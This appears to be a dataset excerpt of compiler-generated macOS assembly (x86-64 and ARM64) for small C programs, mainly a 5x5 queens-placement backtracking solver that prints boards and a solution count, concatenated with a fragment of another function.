movq -112(%rbp), %rax ## 8-byte Reload
movq -24(%rbp), %rcx
movslq -96(%rbp), %rdx
movq (%rcx,%rdx,8), %rcx
movslq 4(%rcx), %rcx
cmpl $1, (%rax,%rcx,4)
jne LBB0_5
## %bb.4: ## in Loop: Header=BB0_1 Depth=1
movq -88(%rbp), %rdi
movq -24(%rbp), %rax
movslq -96(%rbp), %rcx
movq (%rax,%rcx,8), %rsi
movl $8, %edx
movq $-1, %rcx
callq ___memcpy_chk
LBB0_5: ## in Loop: Header=BB0_1 Depth=1
movq -128(%rbp), %rax ## 8-byte Reload
movq -144(%rbp), %rcx ## 8-byte Reload
movq -112(%rbp), %rdx ## 8-byte Reload
movq -24(%rbp), %rsi
movslq -96(%rbp), %rdi
movq (%rsi,%rdi,8), %rsi
movslq 4(%rsi), %rsi
movl $1, (%rdx,%rsi,4)
movq -24(%rbp), %rsi
movslq -96(%rbp), %rdi
movq (%rsi,%rdi,8), %rsi
movslq (%rsi), %rsi
movl $1, (%rdx,%rsi,4)
movq -24(%rbp), %rdx
movslq -96(%rbp), %rsi
movq (%rdx,%rsi,8), %rdx
movl (%rdx), %esi
movq -24(%rbp), %rdx
movslq -96(%rbp), %rdi
movq (%rdx,%rdi,8), %rdx
movslq 4(%rdx), %rdx
shlq $3, %rdx
addq %rdx, %rcx
movq -24(%rbp), %rdx
movslq -96(%rbp), %rdi
movq (%rdx,%rdi,8), %rdx
movslq 4(%rdx), %rdi
movl (%rax,%rdi,4), %edx
movl %edx, %r8d
addl $1, %r8d
movl %r8d, (%rax,%rdi,4)
movslq %edx, %rdx
movl %esi, (%rcx,%rdx,4)
movq -24(%rbp), %rcx
movslq -96(%rbp), %rdx
movq (%rcx,%rdx,8), %rcx
movslq 4(%rcx), %rcx
cmpl $1, (%rax,%rcx,4)
jle LBB0_7
## %bb.6: ## in Loop: Header=BB0_1 Depth=1
movq -24(%rbp), %rax
movslq -96(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movl 4(%rax), %eax
movl %eax, -92(%rbp)
LBB0_7: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_8
LBB0_8: ## in Loop: Header=BB0_1 Depth=1
movl -96(%rbp), %eax
addl $1, %eax
movl %eax, -96(%rbp)
jmp LBB0_1
LBB0_9:
cmpl $-1, -92(%rbp)
jne LBB0_11
## %bb.10:
movq -88(%rbp), %rax
movq %rax, -16(%rbp)
movl $1, -100(%rbp)
jmp LBB0_20
LBB0_11:
movq -144(%rbp), %rax ## 8-byte Reload
movslq -92(%rbp), %rcx
movl (%rax,%rcx,8), %eax
movl %eax, -104(%rbp)
LBB0_12: ## =>This Inner Loop Header: Depth=1
movq -128(%rbp), %rcx ## 8-byte Reload
movslq -104(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, (%rcx,%rdx,4)
movb %al, -153(%rbp) ## 1-byte Spill
je LBB0_14
## %bb.13: ## in Loop: Header=BB0_12 Depth=1
movl -104(%rbp), %eax
cmpl -92(%rbp), %eax
setne %al
movb %al, -153(%rbp) ## 1-byte Spill
LBB0_14: ## in Loop: Header=BB0_12 Depth=1
movb -153(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB0_15
jmp LBB0_16
LBB0_15: ## in Loop: Header=BB0_12 Depth=1
movq -144(%rbp), %rax ## 8-byte Reload
movslq -104(%rbp), %rcx
movl (%rax,%rcx,8), %eax
movl %eax, -104(%rbp)
jmp LBB0_12
LBB0_16:
movl -104(%rbp), %eax
cmpl -92(%rbp), %eax
jne LBB0_18
## %bb.17:
movq -144(%rbp), %rax ## 8-byte Reload
movslq -92(%rbp), %rcx
movl (%rax,%rcx,8), %ecx
movq -88(%rbp), %rax
movl %ecx, (%rax)
movl -92(%rbp), %ecx
movq -88(%rbp), %rax
movl %ecx, 4(%rax)
jmp LBB0_19
LBB0_18:
movq -144(%rbp), %rax ## 8-byte Reload
movslq -92(%rbp), %rcx
movl 4(%rax,%rcx,8), %ecx
movq -88(%rbp), %rax
movl %ecx, (%rax)
movl -92(%rbp), %ecx
movq -88(%rbp), %rax
movl %ecx, 4(%rax)
LBB0_19:
movq -88(%rbp), %rax
movq %rax, -16(%rbp)
movl $1, -100(%rbp)
LBB0_20:
movq -56(%rbp), %rax
movq %rax, %rsp
movq -16(%rbp), %rax
movq %rax, -168(%rbp) ## 8-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_22
## %bb.21:
movq -168(%rbp), %rax ## 8-byte Reload
movq %rbp, %rsp
popq %rbp
retq
LBB0_22:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/90763833.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _printField ; -- Begin function printField
.p2align 2
_printField: ; @printField
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
str wzr, [sp, #4]
str wzr, [sp]
str wzr, [sp, #4]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_3 Depth 2
ldr w8, [sp, #4]
subs w8, w8, #5
cset w8, ge
tbnz w8, #0, LBB0_11
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
str wzr, [sp]
b LBB0_3
LBB0_3: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp]
subs w8, w8, #5
cset w8, ge
tbnz w8, #0, LBB0_9
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=2
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
mov x10, #20
mul x9, x9, x10
add x8, x8, x9
ldrsw x9, [sp]
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_3 Depth=2
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB0_7
LBB0_6: ; in Loop: Header=BB0_3 Depth=2
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_3 Depth=2
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_3 Depth=2
ldr w8, [sp]
add w8, w8, #1
str w8, [sp]
b LBB0_3
LBB0_9: ; in Loop: Header=BB0_1 Depth=1
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _printf
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB0_1
LBB0_11:
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _checkOtherStone ; -- Begin function checkOtherStone
.p2align 2
_checkOtherStone: ; @checkOtherStone
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
str x0, [sp, #32]
str w1, [sp, #28]
str w2, [sp, #24]
str wzr, [sp, #20]
str wzr, [sp, #16]
str wzr, [sp, #20]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #20]
subs w8, w8, #5
cset w8, ge
tbnz w8, #0, LBB1_6
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #32]
ldrsw x9, [sp, #20]
mov x10, #20
mul x9, x9, x10
add x8, x8, x9
ldrsw x9, [sp, #24]
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB1_4
b LBB1_3
LBB1_3:
mov w8, #1
str w8, [sp, #44]
b LBB1_39
LBB1_4: ; in Loop: Header=BB1_1 Depth=1
b LBB1_5
LBB1_5: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
b LBB1_1
LBB1_6:
ldr w8, [sp, #28]
str w8, [sp, #20]
ldr w8, [sp, #24]
str w8, [sp, #16]
b LBB1_7
LBB1_7: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #20]
subs w8, w8, #0
cset w8, lt
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_9
b LBB1_8
LBB1_8: ; in Loop: Header=BB1_7 Depth=1
ldr w8, [sp, #16]
subs w8, w8, #0
cset w8, ge
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB1_9
LBB1_9: ; in Loop: Header=BB1_7 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
tbz w8, #0, LBB1_14
b LBB1_10
LBB1_10: ; in Loop: Header=BB1_7 Depth=1
ldr x8, [sp, #32]
ldrsw x9, [sp, #20]
mov x10, #20
mul x9, x9, x10
add x8, x8, x9
ldrsw x9, [sp, #16]
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB1_12
b LBB1_11
LBB1_11:
mov w8, #1
str w8, [sp, #44]
b LBB1_39
LBB1_12: ; in Loop: Header=BB1_7 Depth=1
b LBB1_13
LBB1_13: ; in Loop: Header=BB1_7 Depth=1
ldr w8, [sp, #20]
subs w8, w8, #1
str w8, [sp, #20]
ldr w8, [sp, #16]
subs w8, w8, #1
str w8, [sp, #16]
b LBB1_7
LBB1_14:
ldr w8, [sp, #28]
str w8, [sp, #20]
ldr w8, [sp, #24]
str w8, [sp, #16]
b LBB1_15
LBB1_15: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #20]
subs w8, w8, #5
cset w8, ge
mov w9, #0
str w9, [sp, #8] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_17
b LBB1_16
LBB1_16: ; in Loop: Header=BB1_15 Depth=1
ldr w8, [sp, #16]
subs w8, w8, #5
cset w8, lt
str w8, [sp, #8] ; 4-byte Folded Spill
b LBB1_17
LBB1_17: ; in Loop: Header=BB1_15 Depth=1
ldr w8, [sp, #8] ; 4-byte Folded Reload
tbz w8, #0, LBB1_22
b LBB1_18
LBB1_18: ; in Loop: Header=BB1_15 Depth=1
ldr x8, [sp, #32]
ldrsw x9, [sp, #20]
mov x10, #20
mul x9, x9, x10
add x8, x8, x9
ldrsw x9, [sp, #16]
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB1_20
b LBB1_19
LBB1_19:
mov w8, #1
str w8, [sp, #44]
b LBB1_39
LBB1_20: ; in Loop: Header=BB1_15 Depth=1
b LBB1_21
LBB1_21: ; in Loop: Header=BB1_15 Depth=1
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
ldr w8, [sp, #16]
add w8, w8, #1
str w8, [sp, #16]
b LBB1_15
LBB1_22:
ldr w8, [sp, #28]
str w8, [sp, #20]
ldr w8, [sp, #24]
str w8, [sp, #16]
b LBB1_23
LBB1_23: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #20]
subs w8, w8, #0
cset w8, lt
mov w9, #0
str w9, [sp, #4] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_25
b LBB1_24
LBB1_24: ; in Loop: Header=BB1_23 Depth=1
ldr w8, [sp, #16]
subs w8, w8, #5
cset w8, lt
str w8, [sp, #4] ; 4-byte Folded Spill
b LBB1_25
LBB1_25: ; in Loop: Header=BB1_23 Depth=1
ldr w8, [sp, #4] ; 4-byte Folded Reload
tbz w8, #0, LBB1_30
b LBB1_26
LBB1_26: ; in Loop: Header=BB1_23 Depth=1
ldr x8, [sp, #32]
ldrsw x9, [sp, #20]
mov x10, #20
mul x9, x9, x10
add x8, x8, x9
ldrsw x9, [sp, #16]
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB1_28
b LBB1_27
LBB1_27:
mov w8, #1
str w8, [sp, #44]
b LBB1_39
LBB1_28: ; in Loop: Header=BB1_23 Depth=1
b LBB1_29
LBB1_29: ; in Loop: Header=BB1_23 Depth=1
ldr w8, [sp, #20]
subs w8, w8, #1
str w8, [sp, #20]
ldr w8, [sp, #16]
add w8, w8, #1
str w8, [sp, #16]
b LBB1_23
LBB1_30:
ldr w8, [sp, #28]
str w8, [sp, #20]
ldr w8, [sp, #24]
str w8, [sp, #16]
b LBB1_31
LBB1_31: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #20]
subs w8, w8, #5
cset w8, ge
mov w9, #0
str w9, [sp] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_33
b LBB1_32
LBB1_32: ; in Loop: Header=BB1_31 Depth=1
ldr w8, [sp, #16]
subs w8, w8, #0
cset w8, ge
str w8, [sp] ; 4-byte Folded Spill
b LBB1_33
LBB1_33: ; in Loop: Header=BB1_31 Depth=1
ldr w8, [sp] ; 4-byte Folded Reload
tbz w8, #0, LBB1_38
b LBB1_34
LBB1_34: ; in Loop: Header=BB1_31 Depth=1
ldr x8, [sp, #32]
ldrsw x9, [sp, #20]
mov x10, #20
mul x9, x9, x10
add x8, x8, x9
ldrsw x9, [sp, #16]
ldr w8, [x8, x9, lsl #2]
subs w8, w8, #1
cset w8, ne
tbnz w8, #0, LBB1_36
b LBB1_35
LBB1_35:
mov w8, #1
str w8, [sp, #44]
b LBB1_39
LBB1_36: ; in Loop: Header=BB1_31 Depth=1
b LBB1_37
LBB1_37: ; in Loop: Header=BB1_31 Depth=1
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
ldr w8, [sp, #16]
subs w8, w8, #1
str w8, [sp, #16]
b LBB1_31
LBB1_38:
str wzr, [sp, #44]
b LBB1_39
LBB1_39:
ldr w0, [sp, #44]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _searchAnswer ; -- Begin function searchAnswer
.p2align 2
_searchAnswer: ; @searchAnswer
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-16]
stur w1, [x29, #-20]
str wzr, [sp, #24]
ldur w8, [x29, #-20]
subs w8, w8, #5
cset w8, ne
tbnz w8, #0, LBB2_2
b LBB2_1
LBB2_1:
adrp x8, _searchAnswer.answer_number@PAGE
ldr w9, [x8, _searchAnswer.answer_number@PAGEOFF]
add w10, w9, #1
str w10, [x8, _searchAnswer.answer_number@PAGEOFF]
mov x9, sp
; implicit-def: $x8
mov x8, x10
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
ldur x0, [x29, #-16]
bl _printField
stur wzr, [x29, #-4]
b LBB2_9
LBB2_2:
str wzr, [sp, #24]
b LBB2_3
LBB2_3: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #24]
subs w8, w8, #5
cset w8, ge
tbnz w8, #0, LBB2_8
b LBB2_4
LBB2_4: ; in Loop: Header=BB2_3 Depth=1
ldur x0, [x29, #-16]
ldur w1, [x29, #-20]
ldr w2, [sp, #24]
bl _checkOtherStone
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB2_6
b LBB2_5
LBB2_5: ; in Loop: Header=BB2_3 Depth=1
ldur x8, [x29, #-16]
ldursw x9, [x29, #-20]
mov x10, #20
str x10, [sp, #16] ; 8-byte Folded Spill
mul x9, x9, x10
add x9, x8, x9
ldrsw x10, [sp, #24]
mov w8, #1
str w8, [x9, x10, lsl #2]
ldur x0, [x29, #-16]
ldur w8, [x29, #-20]
add w1, w8, #1
bl _searchAnswer
ldr x10, [sp, #16] ; 8-byte Folded Reload
ldur x8, [x29, #-16]
ldursw x9, [x29, #-20]
mul x9, x9, x10
add x9, x8, x9
ldrsw x10, [sp, #24]
mov w8, #0
str w8, [x9, x10, lsl #2]
b LBB2_6
LBB2_6: ; in Loop: Header=BB2_3 Depth=1
b LBB2_7
LBB2_7: ; in Loop: Header=BB2_3 Depth=1
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB2_3
LBB2_8:
adrp x8, _searchAnswer.answer_number@PAGE
ldr w8, [x8, _searchAnswer.answer_number@PAGEOFF]
stur w8, [x29, #-4]
b LBB2_9
LBB2_9:
ldur w0, [x29, #-4]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #160
.cfi_def_cfa_offset 160
stp x29, x30, [sp, #144] ; 16-byte Folded Spill
add x29, sp, #144
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #32]
str wzr, [sp, #28]
str wzr, [sp, #24]
str wzr, [sp, #28]
b LBB3_1
LBB3_1: ; =>This Loop Header: Depth=1
; Child Loop BB3_3 Depth 2
ldr w8, [sp, #28]
subs w8, w8, #5
cset w8, ge
tbnz w8, #0, LBB3_8
b LBB3_2
LBB3_2: ; in Loop: Header=BB3_1 Depth=1
str wzr, [sp, #24]
b LBB3_3
LBB3_3: ; Parent Loop BB3_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #24]
subs w8, w8, #5
cset w8, ge
tbnz w8, #0, LBB3_6
b LBB3_4
LBB3_4: ; in Loop: Header=BB3_3 Depth=2
ldrsw x8, [sp, #28]
mov x9, #20
mul x9, x8, x9
add x8, sp, #36
add x9, x8, x9
ldrsw x10, [sp, #24]
mov w8, #0
str w8, [x9, x10, lsl #2]
b LBB3_5
LBB3_5: ; in Loop: Header=BB3_3 Depth=2
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB3_3
LBB3_6: ; in Loop: Header=BB3_1 Depth=1
b LBB3_7
LBB3_7: ; in Loop: Header=BB3_1 Depth=1
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB3_1
LBB3_8:
add x0, sp, #36
mov w1, #0
bl _searchAnswer
str w0, [sp, #20]
ldr w9, [sp, #20]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB3_10
b LBB3_9
LBB3_9:
bl ___stack_chk_fail
LBB3_10:
mov w0, #0
ldp x29, x30, [sp, #144] ; 16-byte Folded Reload
add sp, sp, #160
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "\342\227\217"
l_.str.1: ; @.str.1
.asciz "\342\226\241"
l_.str.2: ; @.str.2
.asciz "\n"
.zerofill __DATA,__bss,_searchAnswer.answer_number,4,2 ; @searchAnswer.answer_number
l_.str.3: ; @.str.3
.asciz "\n<%d>\n"
l_.str.4: ; @.str.4
.asciz "\n\350\247\243\343\201\256\347\267\217\346\225\260:%d\345\200\213\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _printField ## -- Begin function printField
.p2align 4, 0x90
_printField: ## @printField
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movl $0, -12(%rbp)
movl $0, -16(%rbp)
movl $0, -12(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_3 Depth 2
cmpl $5, -12(%rbp)
jge LBB0_11
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl $0, -16(%rbp)
LBB0_3: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $5, -16(%rbp)
jge LBB0_9
## %bb.4: ## in Loop: Header=BB0_3 Depth=2
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
imulq $20, %rcx, %rcx
addq %rcx, %rax
movslq -16(%rbp), %rcx
cmpl $1, (%rax,%rcx,4)
jne LBB0_6
## %bb.5: ## in Loop: Header=BB0_3 Depth=2
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB0_7
LBB0_6: ## in Loop: Header=BB0_3 Depth=2
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
LBB0_7: ## in Loop: Header=BB0_3 Depth=2
jmp LBB0_8
LBB0_8: ## in Loop: Header=BB0_3 Depth=2
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB0_3
LBB0_9: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _printf
## %bb.10: ## in Loop: Header=BB0_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB0_1
LBB0_11:
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _checkOtherStone ## -- Begin function checkOtherStone
.p2align 4, 0x90
_checkOtherStone: ## @checkOtherStone
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movl %esi, -20(%rbp)
movl %edx, -24(%rbp)
movl $0, -28(%rbp)
movl $0, -32(%rbp)
movl $0, -28(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
cmpl $5, -28(%rbp)
jge LBB1_6
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movq -16(%rbp), %rax
movslq -28(%rbp), %rcx
imulq $20, %rcx, %rcx
addq %rcx, %rax
movslq -24(%rbp), %rcx
cmpl $1, (%rax,%rcx,4)
jne LBB1_4
## %bb.3:
movl $1, -4(%rbp)
jmp LBB1_39
LBB1_4: ## in Loop: Header=BB1_1 Depth=1
jmp LBB1_5
LBB1_5: ## in Loop: Header=BB1_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB1_1
LBB1_6:
movl -20(%rbp), %eax
movl %eax, -28(%rbp)
movl -24(%rbp), %eax
movl %eax, -32(%rbp)
LBB1_7: ## =>This Inner Loop Header: Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -28(%rbp)
movb %al, -33(%rbp) ## 1-byte Spill
jl LBB1_9
## %bb.8: ## in Loop: Header=BB1_7 Depth=1
cmpl $0, -32(%rbp)
setge %al
movb %al, -33(%rbp) ## 1-byte Spill
LBB1_9: ## in Loop: Header=BB1_7 Depth=1
movb -33(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB1_10
jmp LBB1_14
LBB1_10: ## in Loop: Header=BB1_7 Depth=1
movq -16(%rbp), %rax
movslq -28(%rbp), %rcx
imulq $20, %rcx, %rcx
addq %rcx, %rax
movslq -32(%rbp), %rcx
cmpl $1, (%rax,%rcx,4)
jne LBB1_12
## %bb.11:
movl $1, -4(%rbp)
jmp LBB1_39
LBB1_12: ## in Loop: Header=BB1_7 Depth=1
jmp LBB1_13
LBB1_13: ## in Loop: Header=BB1_7 Depth=1
movl -28(%rbp), %eax
addl $-1, %eax
movl %eax, -28(%rbp)
movl -32(%rbp), %eax
addl $-1, %eax
movl %eax, -32(%rbp)
jmp LBB1_7
LBB1_14:
movl -20(%rbp), %eax
movl %eax, -28(%rbp)
movl -24(%rbp), %eax
movl %eax, -32(%rbp)
LBB1_15: ## =>This Inner Loop Header: Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $5, -28(%rbp)
movb %al, -34(%rbp) ## 1-byte Spill
jge LBB1_17
## %bb.16: ## in Loop: Header=BB1_15 Depth=1
cmpl $5, -32(%rbp)
setl %al
movb %al, -34(%rbp) ## 1-byte Spill
LBB1_17: ## in Loop: Header=BB1_15 Depth=1
movb -34(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB1_18
jmp LBB1_22
LBB1_18: ## in Loop: Header=BB1_15 Depth=1
movq -16(%rbp), %rax
movslq -28(%rbp), %rcx
imulq $20, %rcx, %rcx
addq %rcx, %rax
movslq -32(%rbp), %rcx
cmpl $1, (%rax,%rcx,4)
jne LBB1_20
## %bb.19:
movl $1, -4(%rbp)
jmp LBB1_39
LBB1_20: ## in Loop: Header=BB1_15 Depth=1
jmp LBB1_21
LBB1_21: ## in Loop: Header=BB1_15 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB1_15
LBB1_22:
movl -20(%rbp), %eax
movl %eax, -28(%rbp)
movl -24(%rbp), %eax
movl %eax, -32(%rbp)
LBB1_23: ## =>This Inner Loop Header: Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, -28(%rbp)
movb %al, -35(%rbp) ## 1-byte Spill
jl LBB1_25
## %bb.24: ## in Loop: Header=BB1_23 Depth=1
cmpl $5, -32(%rbp)
setl %al
movb %al, -35(%rbp) ## 1-byte Spill
LBB1_25: ## in Loop: Header=BB1_23 Depth=1
movb -35(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB1_26
jmp LBB1_30
LBB1_26: ## in Loop: Header=BB1_23 Depth=1
movq -16(%rbp), %rax
movslq -28(%rbp), %rcx
imulq $20, %rcx, %rcx
addq %rcx, %rax
movslq -32(%rbp), %rcx
cmpl $1, (%rax,%rcx,4)
jne LBB1_28
## %bb.27:
movl $1, -4(%rbp)
jmp LBB1_39
LBB1_28: ## in Loop: Header=BB1_23 Depth=1
jmp LBB1_29
LBB1_29: ## in Loop: Header=BB1_23 Depth=1
movl -28(%rbp), %eax
addl $-1, %eax
movl %eax, -28(%rbp)
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB1_23
LBB1_30:
movl -20(%rbp), %eax
movl %eax, -28(%rbp)
movl -24(%rbp), %eax
movl %eax, -32(%rbp)
LBB1_31: ## =>This Inner Loop Header: Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $5, -28(%rbp)
movb %al, -36(%rbp) ## 1-byte Spill
jge LBB1_33
## %bb.32: ## in Loop: Header=BB1_31 Depth=1
cmpl $0, -32(%rbp)
setge %al
movb %al, -36(%rbp) ## 1-byte Spill
LBB1_33: ## in Loop: Header=BB1_31 Depth=1
movb -36(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB1_34
jmp LBB1_38
LBB1_34: ## in Loop: Header=BB1_31 Depth=1
movq -16(%rbp), %rax
movslq -28(%rbp), %rcx
imulq $20, %rcx, %rcx
addq %rcx, %rax
movslq -32(%rbp), %rcx
cmpl $1, (%rax,%rcx,4)
jne LBB1_36
## %bb.35:
movl $1, -4(%rbp)
jmp LBB1_39
LBB1_36: ## in Loop: Header=BB1_31 Depth=1
jmp LBB1_37
LBB1_37: ## in Loop: Header=BB1_31 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
movl -32(%rbp), %eax
addl $-1, %eax
movl %eax, -32(%rbp)
jmp LBB1_31
LBB1_38:
movl $0, -4(%rbp)
LBB1_39:
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _searchAnswer ## -- Begin function searchAnswer
.p2align 4, 0x90
_searchAnswer: ## @searchAnswer
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -16(%rbp)
movl %esi, -20(%rbp)
movl $0, -24(%rbp)
cmpl $5, -20(%rbp)
jne LBB2_2
## %bb.1:
movl _searchAnswer.answer_number(%rip), %esi
addl $1, %esi
movl %esi, _searchAnswer.answer_number(%rip)
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
movq -16(%rbp), %rdi
callq _printField
movl $0, -4(%rbp)
jmp LBB2_9
LBB2_2:
movl $0, -24(%rbp)
LBB2_3: ## =>This Inner Loop Header: Depth=1
cmpl $5, -24(%rbp)
jge LBB2_8
## %bb.4: ## in Loop: Header=BB2_3 Depth=1
movq -16(%rbp), %rdi
movl -20(%rbp), %esi
movl -24(%rbp), %edx
callq _checkOtherStone
cmpl $0, %eax
jne LBB2_6
## %bb.5: ## in Loop: Header=BB2_3 Depth=1
movq -16(%rbp), %rax
movslq -20(%rbp), %rcx
imulq $20, %rcx, %rcx
addq %rcx, %rax
movslq -24(%rbp), %rcx
movl $1, (%rax,%rcx,4)
movq -16(%rbp), %rdi
movl -20(%rbp), %esi
addl $1, %esi
callq _searchAnswer
movq -16(%rbp), %rax
movslq -20(%rbp), %rcx
imulq $20, %rcx, %rcx
addq %rcx, %rax
movslq -24(%rbp), %rcx
movl $0, (%rax,%rcx,4)
LBB2_6: ## in Loop: Header=BB2_3 Depth=1
jmp LBB2_7
LBB2_7: ## in Loop: Header=BB2_3 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB2_3
LBB2_8:
